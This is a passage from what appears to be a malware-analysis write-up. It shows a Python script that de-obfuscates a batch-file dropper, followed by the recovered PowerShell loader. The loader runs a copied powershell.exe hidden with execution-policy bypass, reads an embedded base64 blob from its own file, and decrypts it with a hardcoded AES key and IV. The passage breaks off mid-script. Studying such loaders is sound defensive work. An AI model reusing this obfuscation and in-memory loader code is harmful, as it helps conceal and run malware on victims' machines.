class="s2">UFw%&#34;wEZCzuPukj=[Sys&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;rVuFsOUxnm=yste&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;fLycQgNMii=oin &#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;KsuJogdoiJ= -no&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;djeIEnPaCg=tsWi&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;brwOvSubJT=e = &#34; </span></span></span><span class="line"><span class="cl"><span class="s2"></span><span class="si">%e</span><span class="s2">UFw%&#34;TOqZKQRZli=uZOc&#34; </span></span></span><span class="line"><span class="cl"><span class="s2">&#34;&#34;&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">ls</span> <span class="o">=</span> <span class="nb">dict</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39;</span><span class="se">\&#34;</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">txt</span> <span class="o">=</span> <span class="p">{}</span> </span></span><span class="line"><span class="cl"><span class="n">k</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"><span class="n">tmp</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">enc</span> <span class="o">=</span> <span class="s1">&#39;%CJnGNBkyYp</span><span class="si">%%</span><span class="s1">UBndSzFkbH</span><span class="si">%%</span><span class="s1">ujJtlzSIGW</span><span class="si">%%</span><span class="s1">nwIWiBzpbz</span><span class="si">%%</span><span class="s1">cHFmSnCqnE</span><span class="si">%%</span><span class="s1">kTEDvsZUvn</span><span class="si">%%</span><span class="s1">JBRccySrUq</span><span class="si">%%</span><span class="s1">ZqjBENExAX</span><span class="si">%%</span><span class="s1">XBucLtReBQ</span><span class="si">%%</span><span class="s1">BFTOQBPCju</span><span class="si">%%</span><span class="s1">vlwWETKcZH</span><span class="si">%%</span><span class="s1">NCtxqhhPqI</span><span class="si">%%</span><span class="s1">GOPdPuwuLd</span><span class="si">%%</span><span class="s1">YcnfCLfyyS</span><span class="si">%%</span><span class="s1">JPfTcZlwxJ</span><span class="si">%%</span><span class="s1">ualBOGvshk</span><span class="si">%%</span><span class="s1">xprVJLooVF</span><span class="si">%%</span><span class="s1">cIqyYRJWbQ</span><span class="si">%%</span><span class="s1">jaXcJXQMrV</span><span class="si">%%</span><span class="s1">pMrovuxjjq</span><span class="si">%%</span><span class="s1">KXASGLJNCX</span><span class="si">%%</span><span class="s1">XzrrbwrpmM</span><span class="si">%%</span><span class="s1">VCWZpprcdE</span><span class="si">%%</span><span class="s1">tzMKflzfvX</span><span class="si">%%</span><span class="s1">ndjtYQuanY</span><span class="si">%%</span><span class="s1">chXxviaBCr</span><span class="si">%%</span><span class="s1">tHJYExMHlP</span><span class="si">%%</span><span class="s1">WmUoySsDby</span><span class="si">%%</span><span class="s1">UrPeBlCopW</span><span class="si">%%</span><span class="s1">lYCdEGtlPA</span><span class="si">%%</span><span class="s1">eNOycQnIZD</span><span class="si">%%</span><span class="s1">PxzdwcSExs</span><span class="si">%%</span><span class="s1">VxroDYJQKR</span><span class="si">%%</span><span class="s1">zhNAugCrcK</span><span class="si">%%</span><span class="s1">XUpMhOyyHB</span><span class="si">%%</span><span class="s1">OOOxFGwzUd</span><span class="si">%%</span><span class="s1">dzPrbmmccE</span><span class="si">%%</span><span class="s1">xQseEVnPet</span><span class="si">%%</span><span class="s1">eDhTebXJLa</span><span class="si">%%</span><span class="s1">vShQyqnqqU</span><span class="si">%%</span><span class="s1">KsuJogdoiJ</span><span class="si">%%</span><span class="s1">uVLEiIUjzw</span><span class="si">%%</span><span class="s1">SJsEzuInUY</span><span class="si">%%</span><span class="s1">gNELMMjyFY</span><span class="si">%%</span><span class="s1">XIAbFAgCIP</span><span class="si">%%</span><span class="s1">weRTbbZPjT</span><span class="si">%%</span><span class="s1">yQujDHraSv</span><span class="si">%%</span><span class="s1">zwDBykiqZZ</span><span class="si">%%</span><span class="s1">nfEeCcWKKK</span><span class="si">%%</span><span class="s1">MtoMzhoqyY</span><span class="si">%%</span><span class="s1">igJmqZApvQ</span><span class="si">%%</span><span class="s1">SIQjFslpHA</span><span class="si">%%</span><span class="s1">KHqiJghRbq</span><span class="si">%%</span><span class="s1">WSRbQhwrOC</span><span class="si">%%</span><span class="s1">BGoTReCegg</span><span class="si">%%</span><span class="s1">WYJXnBQBDj</span><span class="si">%%</span><span class="s1">SIneUaQPty</span><span class="si">%%</span><span class="s1">WTAeYdswqF</span><span class="si">%%</span><span class="s1">EdLUuXiTNo</span><span class="si">%%</span><span class="s1">rVOFKTskYR</span><span class="si">%%</span><span class="s1">nMLIkcyFZj</span><span class="si">%%</span><span class="s1">jtkYEPXtKX</span><span class="si">%%</span><span class="s1">RWcegafVtf</span><span class="si">%%</span><span class="s1">KhyyrSrcKr</span><span class="si">%%</span><span class="s1">zDUDeXKPaV</span><span class="si">%%</span><span class="s1">VZAbZqJHBk</span><span class="si">%%</span><span class="s1">XClTzcVMGM</span><span class="si">%%</span><span class="s1">xVIsxobyZi</span><span class="si">%%</span><span class="s1">qpUykKHwzb</span><span class="si">%%</span><span class="s1">iKAAuWsbec</span><span class="si">%%</span><span class="s1">cYinxarhDL</span><span class="si">%%</span><span class="s1">olHsTHINJO</span><span class="si">%%</span><span class="s1">uynFENuiYB</span><span class="si">%%</span><span class="s1">WauWfrgGak</span><span class="si">%%</span><span class="s1">tzSNMWchGN</span><span class="si">%%</span><span class="s1">oFspIELDJK</span><span class="si">%%</span><span class="s1">FijcPoQLnC</span><span class="si">%%</span><span class="s1">AbMyvUGzSH</span><span class="si">%%</span><span class="s1">LmCknrHfoB</span><span class="si">%%</span><span class="s1">GDXqElqPYy</span><span class="si">%%</span><span class="s1">gqUdnmSTUN</span><span class="si">%%</span><span class="s1">YlKbYsFYPy</span><span class="si">%%</span><span class="s1">GLwLVWewUj</span><span class="si">%%</span><span class="s1">EQAuBusyXb</span><span class="si">%%</span><span class="s1">yOkBDuSVrl</span><span class="si">%%</span><span class="s1">FraARuTjiq</span><span class="si">%%</span><span class="s1">hwZKiiLqAE</span><span class="si">%%</span><span class="s1">ahbOZSBViB</span><span class="si">%%</span><span class="s1">djeIEnPaCg</span><span class="si">%%</span><span class="s1">AiqHTcPzsv</span><span class="si">%%</span><span class="s1">JCuNlxqlBZ</span><span class="si">%%</span><span class="s1">TYbHmXrqgV</span><span class="si">%%</span><span class="s1">sLNudRRtUX</span><span class="si">%%</span><span class="s1">dbDMRBPrxg</span><span class="si">%%</span><span class="s1">XEyDmChJvW</span><span class="si">%%</span><span class="s1">KytxcYPZKt</span><span class="si">%%</span><span class="s1">GWrDWSvoPL</span><span class="si">%%</span><span class="s1">haSZYOmkiA</span><span class="si">%%</span><span class="s1">JhYYmEHfJT</span><span class="si">%%</span><span class="s1">LPGeAanVGt</span><span class="si">%%</span><span class="s1">hTTJOKGuzo</span><span class="si">%%</span><span class="s1">MFRjJyYsrs</span><span class="si">%%</span><span class="s1">kpEWZrtOzX</span><span class="si">%%</span><span class="s1">BrDOtQoojB</span><span class="si">%%</span><span class="s1">YnGvhgYxvb</span><span class="si">%%</span><span class="s1">cUDojRpXKx</span><span class="si">%%</span><span class="s1">rSVBNvbdPT</span><span class="si">%%</span><span class="s1">kJjQuXIjOT</span><span class="si">%%</span><span class="s1">tVtxVGNpFB</span><span class="si">%%</span><span class="s1">BqEMjgsfHM</span><span class="si">%%</span><span class="s1">fVHBRsLNUl</span><span class="si">%%</span><span class="s1">jgiQdwyxFg</span><span class="si">%%</span><span class="s1">HLynrUfwGo</span><span class="si">%%</span><span class="s1">FCBcNynRGD</span><span class="si">%%</span><span class="s1">VavtsuhNIN</span><span class="si">%%</span><span class="s1">HUAAetwukX</span><span class="si">%%</span><span class="s1">nogFGGEgdF</span><span class="si">%%</span><span class="s1">iHRclHpeVX</span><span class="si">%%</span><span class="s1">MrNTGKcbYu</span><span class="si">%%</span><span class="s1">bTHJpHTPMM</span><span class="si">%%</span><span class="s1">QbKdEZdxpx</span><span class="si">%%</span><span class="s1">drymkVAnZW</span><span class="si">%%</span><span class="s1">DDiJEpaiME</span><span class="si">%%</span><span class="s1">OAsjgKHKoH</span><span class="si">%%</span><span class="s1">HFLAqJuuyu</span><span class="si">%%</span><span class="s1">gFQQimTbzp</span><span class="si">%%</span><span class="s1">YULKJDZpgz</span><span class="si">%%</span><span class="s1">oQYrpYRHsU</span><span class="si">%%</span><span class="s1">VGKsxiJBaT</span><span class="si">%%</span><span class="s1">RGlZIMTaRM</span><span class="si">%%</span><span class="s1">JenYfqHzBk</span><span class="si">%%</span><span class="s1">vmIEtsktnA</span><span class="si">%%</span><span class="s1">TypmIIEYJC</span><span class="si">%%</span><span class="s1">eQPFkQsLmh</span><span class="si">%%</span><span class="s1">AkaPyEXHFq</span><span class="si">%%</span><span class="s1">BANrSlObpx</span><span class="si">%%</span><span class="s1">LIQYgFxctD</span><span class="si">%%</span><span class="s1">ZygfZJxAOd</span><span class="si">%%</span><span class="s1">KXttaDcyMZ</span><span class="si">%%</span><span class="s1">brwOvSubJT</span><span class="si">%%</span><span class="s1">hVncqdtHrj</span><span class="si">%%</span><span class="s1">OonlMOpxYC</span><span class="si">%%</span><span class="s1">CZpuCIcrKh</span><span class="si">%%</span><span class="s1">owRVWPJqcX</span><span class="si">%%</span><span class="s1">jugDlMdkcG</span><span class="si">%%</span><span class="s1">DXdgqiFTAH</span><span class="si">%%</span><span class="s1">acXjUrxrpX</span><span class="si">%%</span><span class="s1">eYuashSMjP</span><span class="si">%%</span><span class="s1">ESpdErsKEO</span><span class="si">%%</span><span class="s1">kQQvXhxXIT</span><span class="si">%%</span><span class="s1">pLUeCEDcNj</span><span class="si">%%</span><span class="s1">pTKKchMUFD</span><span class="si">%%</span><span class="s1">ZMNBNnhYdl</span><span class="si">%%</span><span class="s1">KVdpASYkBZ</span><span class="si">%%</span><span class="s1">OpWuyrggtP</span><span class="si">%%</span><span class="s1">uDsfTCYsro</span><span class="si">%%</span><span class="s1">wEZCzuPukj</span><span class="si">%%</span><span class="s1">jCsFOJQsdv</span><span class="si">%%</span><span class="s1">hbFnQgCXwX</span><span class="si">%%</span><span class="s1">UFSmCjquVd</span><span class="si">%%</span><span class="s1">BMVjGSkNrk</span><span class="si">%%</span><span class="s1">MFpVhvZMMs</span><span class="si">%%</span><span class="s1">SRYmoDJgcF</span><span class="si">%%</span><span class="s1">svwZUufvHX</span><span class="si">%%</span><span class="s1">WPGlloqWfh</span><span class="si">%%</span><span class="s1">kEHDlJOIVc</span><span class="si">%%</span><span class="s1">jdKMRqipbM</span><span class="si">%%</span><span class="s1">pEeOvclMbZ</span><span class="si">%%</span><span class="s1">nMbUuONTOk</span><span class="si">%%</span><span class="s1">GwAFOSfUtV</span><span class="si">%%</span><span class="s1">gbVsRGzTij</span><span class="si">%%</span><span class="s1">ybHVOwcPrc</span><span class="si">%%</span><span class="s1">CpAQgSdzaC</span><span class="si">%%</span><span class="s1">XqtgTmRIdO</span><span class="si">%%</span><span class="s1">pUKFMEPFQs</span><span class="si">%%</span><span class="s1">QpDqsQAemY</span><span class="si">%%</span><span class="s1">CZTFliIBbC</span><span class="si">%%</span><span class="s1">EuMCNHEVeC</span><span class="si">%%</span><span class="s1">dyJHMHMcNc</span><span class="si">%%</span><span class="s1">LNwemqbftD</span><span class="si">%%</span><span class="s1">VnDoNvCbDL</span><span class="si">%%</span><span class="s1">mFZJVdqlTD</span><span class="si">%%</span><span class="s1">vGOYQQYIpx</span><span class="si">%%</span><span class="s1">GzBAHPVuTq</span><span class="si">%%</span><span class="s1">fLycQgNMii</span><span class="si">%%</span><span class="s1">ZPlPiozEyW</span><span class="si">%%</span><span class="s1">xULgeMdzcg</span><span class="si">%%</span><span class="s1">iVrCyJhMiJ</span><span class="si">%%</span><span class="s1">dlzhxQnMss</span><span class="si">%%</span><span class="s1">pqWXTkasXe</span><span class="si">%%</span><span class="s1">doKcadyJqy</span><span class="si">%%</span><span class="s1">hNwOTmvEJo</span><span class="si">%%</span><span class="s1">yqhJQSZuJo</span><span class="si">%%</span><span class="s1">JPOdGPAwht</span><span class="si">%%</span><span class="s1">rEvTlCThdH</span><span class="si">%%</span><span class="s1">PwJJFMgamh</span><span class="si">%%</span><span class="s1">eeacPrYshd</span><span class="si">%%</span><span class="s1">LYxpWUVnyn</span><span class="si">%%</span><span class="s1">YRqcyngfyU</span><span class="si">%%</span><span class="s1">IAkZpnEseT</span><span class="si">%%</span><span class="s1">DAaZVQYtML</span><span class="si">%%</span><span class="s1">QTBYjmNXEB</span><span class="si">%%</span><span class="s1">lSUnvlNyZI</span><span class="si">%%</span><span class="s1">pCjFJxRqgH</span><span class="si">%%</span><span class="s1">oMsMdPYmPd</span><span class="si">%%</span><span class="s1">AGOCIKFMEK</span><span class="si">%%</span><span class="s1">dAuevoJWoL</span><span class="si">%%</span><span class="s1">uwRWnyAikF</span><span class="si">%%</span><span class="s1">mBIWiJNHWZ</span><span class="si">%%</span><span class="s1">RfMwENsorP</span><span class="si">%%</span><span class="s1">gbXeIdPSoj</span><span class="si">%%</span><span class="s1">kxCYxBSxVM</span><span class="si">%%</span><span class="s1">AbZpTpKurz</span><span class="si">%%</span><span class="s1">glRvzlEEoe</span><span class="si">%%</span><span class="s1">TVsNOuCNZd</span><span class="si">%%</span><span class="s1">VUsEoebHks</span><span class="si">%%</span><span class="s1">tuAPcYGhzl</span><span class="si">%%</span><span class="s1">WojQSFImBz</span><span class="si">%%</span><span class="s1">NXvoEmTmgu</span><span class="si">%%</span><span class="s1">jWtWLzuDKP</span><span class="si">%%</span><span class="s1">NvnNgHLBLJ</span><span class="si">%%</span><span class="s1">vPgKEvZmlQ</span><span class="si">%%</span><span class="s1">ftaecaUnft</span><span class="si">%%</span><span class="s1">lfCLMrJHhW</span><span class="si">%%</span><span class="s1">ArAxZuPIrp</span><span class="si">%%</span><span class="s1">zhsTKtujLg</span><span class="si">%%</span><span class="s1">MxwsyqmvYm</span><span class="si">%%</span><span class="s1">MsfoqNTDfI</span><span class="si">%%</span><span class="s1">klVPUdMJas</span><span class="si">%%</span><span class="s1">XzWakcViZI</span><span class="si">%%</span><span class="s1">htJeDhbeDW</span><span class="si">%%</span><span class="s1">ARecVABHyu</span><span class="si">%%</span><span class="s1">EDuGpmwedn</span><span class="si">%%</span><span class="s1">SKEwAQBRlN</span><span class="si">%%</span><span class="s1">bIgeRgvTeJ</span><span class="si">%%</span><span class="s1">AnKEeEZdOq</span><span class="si">%%</span><span class="s1">KXapePmHCe</span><span class="si">%%</span><span class="s1">YKwLsVwqOj</span><span class="si">%%</span><span class="s1">QCZuMFaZsV</span><span class="si">%%</span><span class="s1">RycUceHQZc</span><span class="si">%%</span><span class="s1">TOqZKQRZli</span><span class="si">%%</span><span class="s1">hIpFAiXGDz</span><span class="si">%%</span><span class="s1">PmpGnAHBIo</span><span class="si">%%</span><span class="s1">nGqMpclaJV</span><span class="si">%%</span><span class="s1">NbOjNijxuU</span><span class="si">%%</span><span class="s1">hbnAmGyJMk</span><span class="si">%%</span><span class="s1">jpqWVBsCpx</span><span class="si">%%</span><span class="s1">WXWHLOygSe</span><span class="si">%%</span><span class="s1">rjhOhltPzI</span><span class="si">%%</span><span class="s1">DCnzMxKRnm</span><span class="si">%%</span><span class="s1">QGiWXkfFPy</span><span class="si">%%</span><span class="s1">isQISZiBPJ</span><span class="si">%%</span><span class="s1">iCcGUuJxVn</span><span class="si">%%</span><span class="s1">dGSGnKbkQW</span><span class="si">%%</span><span class="s1">gNabAkLFGN</span><span class="si">%%</span><span class="s1">pibEdoDBbD</span><span class="si">%%</span><span class="s1">AHKCuBAkui</span><span class="si">%%</span><span class="s1">YYKSCuCbgJ</span><span class="si">%%</span><span class="s1">IeRiYUFnCZ</span><span class="si">%%</span><span class="s1">hzjnwzdyGY</span><span class="si">%%</span><span class="s1">KAlyOryibJ</span><span class="si">%%</span><span class="s1">MBvrUwPCDz</span><span class="si">%%</span><span class="s1">WmHvayPxwd</span><span class="si">%%</span><span class="s1">reviZiSttH</span><span class="si">%%</span><span class="s1">wwmTmFdRsZ</span><span class="si">%%</span><span class="s1">JBUgbyTPxp</span><span class="si">%%</span><span class="s1">BaMYsIgnsM</span><span class="si">%%</span><span class="s1">DwiWdAaOiv</span><span class="si">%%</span><span class="s1">vXewtPjogB</span><span class="si">%%</span><span class="s1">odWdfvJnBE</span><span class="si">%%</span><span class="s1">yPzFwnsYdA</span><span class="si">%%</span><span class="s1">xfHbUEWpFC</span><span class="si">%%</span><span class="s1">ySgQyAAfQH</span><span class="si">%%</span><span class="s1">QMmDXFyyag</span><span class="si">%%</span><span class="s1">xllGdjvUjB</span><span class="si">%%</span><span class="s1">zuIYfGJIhV</span><span class="si">%%</span><span class="s1">MmhvJKSdep</span><span class="si">%%</span><span class="s1">fxpyemHAMo</span><span class="si">%%</span><span class="s1">eFWpiweoyr</span><span class="si">%%</span><span class="s1">WQqetkePWs</span><span class="si">%%</span><span class="s1">qsPTvcejTS</span><span class="si">%%</span><span class="s1">YiVTQhqRnm</span><span class="si">%%</span><span class="s1">GEFNspgkfU</span><span class="si">%%</span><span class="s1">iREuYMPcTg</span><span class="si">%%</span><span class="s1">rVuFsOUxnm</span><span class="si">%%</span><span class="s1">UmCJMMMcBg</span><span class="si">%%</span><span class="s1">VUeZKgDBUe</span><span class="si">%%</span><span class="s1">roXhULjavE</span><span class="si">%%</span><span class="s1">uIWSZVpUHl</span><span class="si">%%</span><span class="s1">ZNBNkxQuUl</span><span class="si">%%</span><span class="s1">ktDjVGpvOa</span><span class="si">%%</span><span class="s1">CMHWMmXlZO</span><span class="si">%%</span><span class="s1">RITIeDNkWx</span><span class="si">%%</span><span class="s1">UPfjubfNXt</span><span class="si">%%</span><span class="s1">GTgGJngEbX</span><span class="si">%%</span><span class="s1">zFvgtBzUer</span><span class="si">%%</span><span class="s1">TfyrgNGxBL</span><span class="si">%%</span><span class="s1">hknFiXCnZQ</span><span class="si">%%</span><span class="s1">xijYXotZPT</span><span class="si">%%</span><span class="s1">BlIFABuPAW</span><span class="si">%%</span><span class="s1">GJcpQprPXv</span><span class="si">%%</span><span class="s1">YmUoUKWAtR</span><span class="si">%%</span><span class="s1">tHHIjVCHeH</span><span class="si">%%</span><span class="s1">DNNdkNfTiI</span><span class="si">%%</span><span class="s1">XEcuUpquLQ</span><span class="si">%%</span><span class="s1">EUwICZcugV</span><span class="si">%%</span><span class="s1">MJKqSlzRdg</span><span class="si">%%</span><span class="s1">FcrKUOEnOU</span><span class="si">%%</span><span class="s1">EiWocIreAk</span><span class="si">%%</span><span class="s1">LLNnWnTLBJ</span><span class="si">%%</span><span class="s1">QzqEkBCLON</span><span class="si">%%</span><span class="s1">uOGlqENvnk</span><span class="si">%%</span><span class="s1">TuqTvTpeOG</span><span class="si">%%</span><span class="s1">USLedfRsdA</span><span class="si">%%</span><span class="s1">fFqNPWfBWr</span><span class="si">%%</span><span class="s1">AyyrPvjwjr</span><span class="si">%%</span><span class="s1">mxXhSCdBil</span><span class="si">%%</span><span class="s1">MusMeoeDey</span><span class="si">%%</span><span class="s1">OOiwgwuupI</span><span class="si">%%</span><span class="s1">WvjMoIIiUn</span><span class="si">%%</span><span class="s1">TEtLFfgLmA</span><span class="si">%%</span><span class="s1">rFsKCxpAbv</span><span class="si">%%</span><span class="s1">hImzprlFyw</span><span class="si">%%</span><span class="s1">GVIREkvxRa</span><span class="si">%%</span><span class="s1">qIhOqqdyjR</span><span class="si">%%</span><span class="s1">shhyfkrTvn</span><span class="si">%%</span><span class="s1">UAnQUvXBfs</span><span class="si">%%</span><span class="s1">bSIafzAxiZ</span><span class="si">%%</span><span class="s1">oNvGdyNkLt</span><span class="si">%%</span><span class="s1">SCbDgQuqTU</span><span class="si">%%</span><span class="s1">tBsRPAyhtG</span><span class="si">%%</span><span class="s1">KUKwZheGNw</span><span class="si">%%</span><span class="s1">INPLAzQfUo</span><span class="si">%%</span><span class="s1">ekEoGMuERC</span><span class="si">%%</span><span class="s1">aGQeJYSFDZ</span><span class="si">%%</span><span class="s1">LODxmGMGqq</span><span class="si">%%</span><span class="s1">KtmeCApwQn</span><span class="si">%%</span><span class="s1">MAPkvbWKbC</span><span class="si">%%</span><span class="s1">HlBVDpGgba</span><span class="si">%%</span><span class="s1">ZNnASGtLCj</span><span class="si">%%</span><span class="s1">IwOqmlYsbl</span><span class="si">%%</span><span class="s1">JbFOJyRrBm</span><span class="si">%%</span><span class="s1">TiuQnZmosP</span><span class="si">%%</span><span class="s1">HkiSTlwlIs</span><span class="si">%%</span><span class="s1">rofQqYizRu</span><span class="si">%%</span><span class="s1">OckpqzbYcn</span><span class="si">%%</span><span class="s1">YJZmDySMUy</span><span class="si">%%</span><span class="s1">cGJiVEdEzp</span><span class="si">%%</span><span class="s1">QNxYaFZSBu</span><span class="si">%%</span><span class="s1">jxjvtHoTnR</span><span class="si">%%</span><span class="s1">fvEtritbuM</span><span class="si">%%</span><span class="s1">wxzMwkmbmY</span><span class="si">%%</span><span class="s1">yZlAoExoOn</span><span class="si">%%</span><span class="s1">pjrIjvjdGR</span><span class="si">%%</span><span class="s1">mYyPXMYwYi</span><span class="si">%%</span><span class="s1">vnHosfjdeN</span><span class="si">%%</span><span class="s1">LfngwmfRCb</span><span class="si">%%</span><span class="s1">bivuMABwCB</span><span class="si">%%</span><span class="s1">GapFScCcpe</span><span class="si">%%</span><span class="s1">lfYSggLrsL</span><span class="si">%%</span><span class="s1">GhTXhmRnCR</span><span class="si">%%</span><span class="s1">ENADhKPHot</span><span class="si">%%</span><span class="s1">KdByPVjCnF</span><span class="si">%%</span><span class="s1">PjdRUyhsyG</span><span class="si">%%</span><span class="s1">kpzxAxFvLw</span><span class="si">%%</span><span class="s1">rddZbDFvhl%&#39;</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">enc</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">i</span> <span class="o">!=</span> <span class="s1">&#39;%&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">tmp</span> <span class="o">+=</span> <span class="n">i</span> </span></span><span class="line"><span class="cl"><span class="n">enc</span> <span class="o">=</span> <span class="n">tmp</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">ls</span><span class="p">),</span> <span class="mi">1</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="s1">&#39;=&#39;</span> <span class="ow">in</span> <span class="n">ls</span><span class="p">[</span><span class="n">i</span><span class="p">]:</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">txt</span><span class="p">[</span><span class="n">ls</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="mi">0</span><span class="p">:</span><span class="mi">10</span><span class="p">]]</span> <span class="o">=</span> <span class="n">ls</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="mi">11</span><span class="p">:]</span> </span></span><span class="line"><span class="cl"> <span class="n">enc</span> <span class="o">=</span> <span class="n">enc</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">ls</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="mi">0</span><span class="p">:</span><span class="mi">10</span><span class="p">],</span> <span class="n">ls</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="mi">11</span><span class="p">:])</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">continue</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">enc</span><span class="p">)</span> </span></span></code></pre></div><p>Which, results in this script:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="nb">copy </span><span class="n">C:WindowsSystem32</span><span class="p">\</span><span class="n">WindowsPowerShell</span> </span></span><span class="line"><span class="cl"><span class="n">1</span><span class="p">.</span><span class="n">0powershell</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">y</span> <span class="n">execd</span> <span class="n">exe</span> <span class="n">-noprofile</span> <span class="n">-windowstyle</span> <span class="n">hidden</span> <span class="n">-ep</span> <span class="n">bypass</span> <span class="n">-command</span> <span class="nv">$eIfqq</span> <span class="p">=</span> <span class="no">[System.IO.File]</span><span class="p">::(</span><span class="s1">&#39;txeTllAdaeR&#39;</span><span class="p">[-</span><span class="n">1</span><span class="p">..-</span><span class="n">11</span><span class="p">]</span> <span class="n">-join</span> <span class="s1">&#39;&#39;</span><span class="p">)(</span><span class="s1">&#39;%~f0&#39;</span><span class="p">).</span><span class="n">Split</span><span class="p">(</span><span class="no">[Environment]</span><span class="p">::</span><span class="n">NewLine</span><span class="p">);</span><span class="k">foreach</span> <span class="p">(</span><span class="nv">$YiLGW</span> <span class="k">in</span> <span class="nv">$eIfqq</span><span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$YiLGW</span><span class="p">.</span><span class="n">StartsWith</span><span class="p">(</span><span class="s1">&#39;:: &#39;</span><span class="p">))</span> <span class="p">{</span> <span class="nv">$VuGcO</span> <span class="p">=</span> <span class="nv">$YiLGW</span><span class="p">.</span><span class="n">Substring</span><span class="p">(</span><span class="n">3</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="p">};</span> <span class="p">};</span><span class="nv">$uZOcm</span> <span class="p">=</span> <span class="no">[System.Convert]</span><span class="p">::(</span><span class="s1">&#39;gnirtS46esaBmorF&#39;</span><span class="p">[-</span><span class="n">1</span><span class="p">..-</span><span class="n">16</span><span class="p">]</span> <span class="n">-join</span> <span class="s1">&#39;&#39;</span><span class="p">)(</span><span class="nv">$VuGcO</span><span class="p">);</span><span class="nv">$BacUA</span> <span class="p">=</span> <span class="nb">New-Object</span> <span class="n">System</span><span class="p">.</span><span class="n">Security</span><span class="p">.</span><span class="n">Cryptography</span><span class="p">.</span><span class="n">AesManaged</span><span class="p">;</span><span class="nv">$BacUA</span><span class="p">.</span><span class="n">Mode</span> <span class="p">=</span> <span class="no">[System.Security.Cryptography.CipherMode]</span><span class="p">::</span><span class="n">CBC</span><span class="p">;</span><span class="nv">$BacUA</span><span class="p">.</span><span class="n">Padding</span> <span class="p">=</span> <span class="no">[System.Security.Cryptography.PaddingMode]</span><span class="p">::</span><span class="n">PKCS7</span><span class="p">;</span><span class="nv">$BacUA</span><span class="p">.</span><span class="n">Key</span> <span class="p">=</span> <span class="no">[System.Convert]</span><span class="p">::(</span><span class="s1">&#39;gnirtS46esaBmorF&#39;</span><span class="p">[-</span><span class="n">1</span><span class="p">..-</span><span class="n">16</span><span class="p">]</span> <span class="n">-join</span> <span class="s1">&#39;&#39;</span><span class="p">)(</span><span class="s1">&#39;0xdfc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=&#39;</span><span class="p">);</span><span class="nv">$BacUA</span><span class="p">.</span><span class="n">IV</span> <span class="p">=</span> <span class="no">[System.Convert]</span><span class="p">::(</span><span class="s1">&#39;gnirtS46esaBmorF&#39;</span><span class="p">[-</span><span class="n">1</span><span class="p">..-</span><span class="n">16</span><span class="p">]</span> <span class="n">-join</span> <span class="s1">&#39;&#39;</span><span class="p">)(</span><span class="s1">&#39;2hn/J717js1MwdbbqMn7Lw==&#39;</span><span class="p">);</span><span class="nv">$Nlgap</span> <span class="p">=</span> <span class="nv">$BacUA</span><span class="p">.</span><span class="n">CreateDecryptor</span><span class="p">();</span><span class="nv">$uZOcm</span> <span class="p">=</span> <span class="nv">$Nlgap</span><span class="p">.</span><span class="n">TransformFinalBlock</span><span class="p">(</span><span class="nv">$uZOcm</span><span class="p">,</span> <span class="n">0</span><span class="p">,</span> <span class="nv">$uZOcm</span><span class="p">.</span><span class="n">Length</span><span class="p">);</span><span class="nv">$Nlgap</span><span class="p">.</span><span class="n">Dispose</span><span class="p">();</span><span class="nv">$BacUA</span><span class="p">.</span><span class="n">Dispose</span><span class="p">();</span><span class="nv">$mNKMr</span> <span class="p">=</span> <span class="nb">New-Object</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">MemoryStream</span><span class="p">(,</span> <span class="nv">$uZOcm</span><span class="p">);</span><span class="nv">$bTMLk</span> <span class="p">=</span> <span class="nb">New-Object</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">MemoryStream</span><span class="p">;</span><span class="nv">$NVPbn</span> <span class="p">=</span> <span class="nb">New-Object</span> <span class="n">System</span><span class="p">.</span><span class="n">IO</span><span class="p">.</span><span class="n">Compression</span><span class="p">.</span><span class="n">GZipStream</span><span class="p">(</span><span class="nv">$mNKMr</span><span class="p">,</span> <span class="no">[IO.Compression.CompressionMode]</span><span class="p">::</span><span class="n">Decompress</span><span class="p">);</span><span class="nv">$NVPbn</span><span class="p">.</span><span class="n">CopyTo</span><span class="p">(</span><span class="nv">$bTMLk</span><span class="p">);</span><span class="nv">$NVPbn</span><span class="p">.</span><span class="n">Dispose</span><span class="p">();</span><span 